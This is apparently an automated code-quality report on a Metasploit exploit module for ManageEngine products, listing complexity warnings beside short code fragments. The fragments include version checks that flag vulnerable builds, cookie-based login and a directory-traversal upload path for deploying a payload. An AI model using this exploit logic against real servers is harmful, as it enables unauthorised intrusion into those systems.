File manageengine_auth_upload.rb has 342 lines of code (exceeds 250 allowed). Consider refactoring.

Open

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

Method get_version has a Cognitive Complexity of 26 (exceeds 5 allowed). Consider refactoring.

Open

  def get_version
    res = send_request_cgi({
      'uri'    => '/',
      'method' => 'GET'
    })

• Read up
  Read up

Method initialize has 65 lines of code (exceeds 25 allowed). Consider refactoring.

Open

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'ManageEngine Multiple Products Authenticated File Upload',
      'Description'   => %q{
        This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk,

Method exploit has a Cognitive Complexity of 16 (exceeds 5 allowed). Consider refactoring.

Open

  def exploit
    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
    end

• Read up
  Read up

Method exploit has 50 lines of code (exceeds 25 allowed). Consider refactoring.

Open

  def exploit
    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
    end

Method login has a Cognitive Complexity of 14 (exceeds 5 allowed). Consider refactoring.

Open

  def login
    # Do we already have a valid cookie? If yes, just return that.
    if datastore['JSESSIONID'] != nil
      cookie = 'JSESSIONID=' + datastore['JSESSIONID'].to_s + ';'
      return cookie

• Read up
  Read up

Consider simplifying this complex logical expression.

Open

    if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == 'sd') ||
    (version[0] <= 6 && version[2] < 99999 && version[3] == 'ae') ||
    (version[3] == 'sc' && version[2] < 99999)
      return Exploit::CheckCode::Appears
    end

Method get_version has 37 lines of code (exceeds 25 allowed). Consider refactoring.

Open

  def get_version
    res = send_request_cgi({
      'uri'    => '/',
      'method' => 'GET'
    })

Method check has a Cognitive Complexity of 12 (exceeds 5 allowed). Consider refactoring.

Open

  def check
    version = get_version
    # TODO: put fixed version on the two ifs below once (if...) products are fixed
    # sd was fixed on build 9031
    # ae and sc still not fixed

• Read up
  Read up

Method login_it360 has a Cognitive Complexity of 12 (exceeds 5 allowed). Consider refactoring.

Open

  def login_it360
    # Do we already have a valid cookie? If yes, just return that.
    if datastore['IAMAGENTTICKET']
      cookie_name = get_it360_cookie_name
      cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'

• Read up
  Read up

Method authenticate_it360 has 30 lines of code (exceeds 25 allowed). Consider refactoring.

Open

  def authenticate_it360(port, path, username, password)
    if datastore['DOMAIN_NAME'] == nil
      vars_post = {
        'LOGIN_ID' => username,
        'PASSWORD' => password,

Method login_it360 has 29 lines of code (exceeds 25 allowed). Consider refactoring.

Open

  def login_it360
    # Do we already have a valid cookie? If yes, just return that.
    if datastore['IAMAGENTTICKET']
      cookie_name = get_it360_cookie_name
      cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'

Method send_multipart_request has 29 lines of code (exceeds 25 allowed). Consider refactoring.

Open

  def send_multipart_request(cookie, payload_name, payload_str)
    if payload_name =~ /\.ear/
      upload_path = '../../server/default/deploy'
    else
      upload_path = rand_text_alpha(4+rand(4))

Method login has 26 lines of code (exceeds 25 allowed). Consider refactoring.

Open

  def login
    # Do we already have a valid cookie? If yes, just return that.
    if datastore['JSESSIONID'] != nil
      cookie = 'JSESSIONID=' + datastore['JSESSIONID'].to_s + ';'
      return cookie

Avoid deeply nested control flow statements.

Open

        if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
          # ... but get the build number if we can find it
          version[2] = $1.to_i
        end

Avoid deeply nested control flow statements.

Open

      elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/
        # IT360 newer versions
        version[3] = 'it'

Method pick_target has a Cognitive Complexity of 8 (exceeds 5 allowed). Consider refactoring.

Open

  def pick_target
    return target if target.name != 'Automatic'

    version = get_version
    if (version[0] <= 7 && version[2] < 7016 && version[3] == 'sd') ||

• Read up
  Read up

Consider simplifying this complex logical expression.

Open

    if (version[2] > 9030 && version[3] == 'sd') ||
        (version[2] > 99999 && version[3] == 'ae') ||
        (version[2] > 99999 && version[3] == 'sc')
      return Exploit::CheckCode::Safe
    else

Consider simplifying this complex logical expression.

Open

    if (version[0] <= 7 && version[2] < 7016 && version[3] == 'sd') ||
    (version[0] == 4 && version[3] == 'ae') ||
    (version[3] == 'sc')
      # These are all "old style" versions (sc is always old style)
      return targets[1]

Avoid too many return statements within this method.

Open

          return cookie